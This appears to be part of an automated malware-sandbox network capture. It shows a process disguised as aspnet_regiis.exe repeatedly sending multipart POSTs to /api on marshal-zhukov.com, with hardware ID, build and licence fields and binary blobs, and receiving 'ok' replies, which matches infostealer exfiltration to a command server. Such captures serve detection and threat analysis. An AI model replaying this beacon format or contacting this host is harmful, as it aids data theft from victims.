                                                                                                                                                                                                            2024-11-14 11:19:39 UTC557INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e
                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE an


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            9192.168.2.1049867188.114.97.34437232C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:40 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=6TZPV83B7YRWQPKT
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 15065
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:40 UTC15065OUTData Raw: 2d 2d 36 54 5a 50 56 38 33 42 37 59 52 57 51 50 4b 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46 0d 0a 2d 2d 36 54 5a 50 56 38 33 42 37 59 52 57 51 50 4b 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 54 5a 50 56 38 33 42 37 59 52 57 51 50 4b 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a 76 38 38 0d 0a 2d
                                                                                                                                                                                                            Data Ascii: --6TZPV83B7YRWQPKTContent-Disposition: form-data; name="hwid"47510FD3503B6555415811FCA26202FF--6TZPV83B7YRWQPKTContent-Disposition: form-data; name="pid"2--6TZPV83B7YRWQPKTContent-Disposition: form-data; name="lid"BVnUqo--@nmrzv88-
                                                                                                                                                                                                            2024-11-14 11:19:42 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:42 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=4mcvjg08hug3kmdfn47q21c39e; expires=Mon, 10-Mar-2025 05:06:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xIBP3JBe%2Fj%2Fuq8hUkOkdldCaOf5x8DBkOoEd7Fs9q5rFyw5iWrv9V8D2Evn6pu%2BPwoPLzvSCD9t2n3cCARWkTmrY9nComzYcaTXGCkCScHEkXWEuzbHwHxE0iM6GYZSWYix47qs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269b9e9a262d45-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1589&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16005&delivery_rate=1868387&cwnd=242&unsent_bytes=0&cid=6444e188f4a0bde1&ts=2007&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:42 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                                                                                                                                            Data Ascii: 11ok 173.254.250.91
                                                                                                                                                                                                            2024-11-14 11:19:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            10192.168.2.1049883188.114.97.34437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:43 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=QJ5YMRZZQEWVSQJUP4
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 15077
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:43 UTC15077OUTData Raw: 2d 2d 51 4a 35 59 4d 52 5a 5a 51 45 57 56 53 51 4a 55 50 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46 0d 0a 2d 2d 51 4a 35 59 4d 52 5a 5a 51 45 57 56 53 51 4a 55 50 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 4a 35 59 4d 52 5a 5a 51 45 57 56 53 51 4a 55 50 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a
                                                                                                                                                                                                            Data Ascii: --QJ5YMRZZQEWVSQJUP4Content-Disposition: form-data; name="hwid"47510FD3503B6555415811FCA26202FF--QJ5YMRZZQEWVSQJUP4Content-Disposition: form-data; name="pid"2--QJ5YMRZZQEWVSQJUP4Content-Disposition: form-data; name="lid"BVnUqo--@nmrz
                                                                                                                                                                                                            2024-11-14 11:19:45 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:45 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=q2shpdn5vqd7v9rck1j4pc4fks; expires=Mon, 10-Mar-2025 05:06:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5K1zgsaNSh%2F5jWSZiJvG9V9XdZf9EnH8sZpCiIigvotzzWktBZAt%2Fqi9hHwLMhXU9fMj9bo1kse4LFxV3%2FqilAFqy9D1YeHPIUfA30zwcKKho%2FDVR8nHfketsivSMgUx%2F1y4Ww%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269bb0b90f47ac-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1147&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2847&recv_bytes=16019&delivery_rate=2278520&cwnd=251&unsent_bytes=0&cid=b1a835c77f343b27&ts=2027&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:45 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                                                                                                                                            Data Ascii: 11ok 173.254.250.91
                                                                                                                                                                                                            2024-11-14 11:19:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            11192.168.2.1049887188.114.97.34437232C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:43 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=OHBF6EA6SQJ0AZ
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 20415
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:43 UTC15331OUTData Raw: 2d 2d 4f 48 42 46 36 45 41 36 53 51 4a 30 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46 0d 0a 2d 2d 4f 48 42 46 36 45 41 36 53 51 4a 30 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4f 48 42 46 36 45 41 36 53 51 4a 30 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a 76 38 38 0d 0a 2d 2d 4f 48 42 46 36
                                                                                                                                                                                                            Data Ascii: --OHBF6EA6SQJ0AZContent-Disposition: form-data; name="hwid"47510FD3503B6555415811FCA26202FF--OHBF6EA6SQJ0AZContent-Disposition: form-data; name="pid"3--OHBF6EA6SQJ0AZContent-Disposition: form-data; name="lid"BVnUqo--@nmrzv88--OHBF6
                                                                                                                                                                                                            2024-11-14 11:19:43 UTC5084OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: lpQ0/74G6(~`~O
                                                                                                                                                                                                            2024-11-14 11:19:45 UTC1020INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:45 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=jlkfmhao1eg76tsm55nv7mg54p; expires=Mon, 10-Mar-2025 05:06:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aIoV96AgES7TiDDlpFwUo6KIW%2B%2FmND6BQbToRdL20rocdQZVKY0iN%2F25V2AdkXRa7bQIyH6thyfyuK2htpQwIsAWz9JMv2UlHPJjlZ0hOKAjAcwdFrRJvlo%2Fr6TA8dfFSoYWBA8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269bb12f426b45-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1813&sent=12&recv=27&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21375&delivery_rate=1553648&cwnd=251&unsent_bytes=0&cid=e991771b47c84d75&ts=1946&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:45 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                                                                                                                                            Data Ascii: 11ok 173.254.250.91
                                                                                                                                                                                                            2024-11-14 11:19:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            12192.168.2.1049903188.114.97.34437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:46 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=5F4HZ8GRG97TWI5BDO
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 20439
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:46 UTC15331OUTData Raw: 2d 2d 35 46 34 48 5a 38 47 52 47 39 37 54 57 49 35 42 44 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46 0d 0a 2d 2d 35 46 34 48 5a 38 47 52 47 39 37 54 57 49 35 42 44 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 46 34 48 5a 38 47 52 47 39 37 54 57 49 35 42 44 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a
                                                                                                                                                                                                            Data Ascii: --5F4HZ8GRG97TWI5BDOContent-Disposition: form-data; name="hwid"47510FD3503B6555415811FCA26202FF--5F4HZ8GRG97TWI5BDOContent-Disposition: form-data; name="pid"3--5F4HZ8GRG97TWI5BDOContent-Disposition: form-data; name="lid"BVnUqo--@nmrz
                                                                                                                                                                                                            2024-11-14 11:19:46 UTC5108OUTData Raw: 00 00 00 00 00 00 00 00 00 60 83 eb 8b 82 f9 0d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f
                                                                                                                                                                                                            Data Ascii: `?lpQ0/74G6(~`~O
                                                                                                                                                                                                            2024-11-14 11:19:47 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:47 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=9c8i5ucqd9dq17vn1h74f462er; expires=Mon, 10-Mar-2025 05:06:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ucayg%2FBHA%2Fpsuajv1wkhJS2YbpBzU8ZDFtgW3rvkNdcCiWcmSIAqbKK4QOTmjyrzU8HQNgJDikQsIFDbPPjWycsEMb3nuuhSsY4qLBgNDjFGrLxd1uzdouD6uwX1pyFjChw11o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269bc319e56b95-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1193&sent=13&recv=27&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21403&delivery_rate=2280314&cwnd=251&unsent_bytes=0&cid=80015c804ff49974&ts=940&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:47 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                                                                                                                                            Data Ascii: 11ok 173.254.250.91
                                                                                                                                                                                                            2024-11-14 11:19:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            13192.168.2.1049904188.114.97.34437232C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:46 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=MO533PF8L53P3O0ZF
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 1253
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:46 UTC1253OUTData Raw: 2d 2d 4d 4f 35 33 33 50 46 38 4c 35 33 50 33 4f 30 5a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46 0d 0a 2d 2d 4d 4f 35 33 33 50 46 38 4c 35 33 50 33 4f 30 5a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 4f 35 33 33 50 46 38 4c 35 33 50 33 4f 30 5a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a 76 38 38
                                                                                                                                                                                                            Data Ascii: --MO533PF8L53P3O0ZFContent-Disposition: form-data; name="hwid"47510FD3503B6555415811FCA26202FF--MO533PF8L53P3O0ZFContent-Disposition: form-data; name="pid"1--MO533PF8L53P3O0ZFContent-Disposition: form-data; name="lid"BVnUqo--@nmrzv88
                                                                                                                                                                                                            2024-11-14 11:19:47 UTC1012INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:47 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=24ngi0tf2v82h57hlhqfr3kivg; expires=Mon, 10-Mar-2025 05:06:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bXDdYhQ5rbqj8dLUP7lepcaIZygNXZUig6aNEnu5g6XaxHnOVd%2FttPOUpwNwjv49YMmh3ZrHrhLBiCwEANWk3SWgIcYuGaK0%2BV9auDV53KhNPp7hwsOBxouYNTEnxlkwQbD0vZs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269bc61ee1e72a-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1340&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2171&delivery_rate=2124724&cwnd=222&unsent_bytes=0&cid=87d7373b113b2f5b&ts=486&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:47 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                                                                                                                                            Data Ascii: 11ok 173.254.250.91
                                                                                                                                                                                                            2024-11-14 11:19:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            14192.168.2.1049914188.114.97.34437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=CDHIRCVWEIA
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 1217
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC1217OUTData Raw: 2d 2d 43 44 48 49 52 43 56 57 45 49 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46 0d 0a 2d 2d 43 44 48 49 52 43 56 57 45 49 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 44 48 49 52 43 56 57 45 49 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a 76 38 38 0d 0a 2d 2d 43 44 48 49 52 43 56 57 45 49 41 0d 0a 43
                                                                                                                                                                                                            Data Ascii: --CDHIRCVWEIAContent-Disposition: form-data; name="hwid"47510FD3503B6555415811FCA26202FF--CDHIRCVWEIAContent-Disposition: form-data; name="pid"1--CDHIRCVWEIAContent-Disposition: form-data; name="lid"BVnUqo--@nmrzv88--CDHIRCVWEIAC
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:48 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=o0me5tl5uhs3lvflah5mholict; expires=Mon, 10-Mar-2025 05:06:27 GMT; Max-Age=9999999; path=/
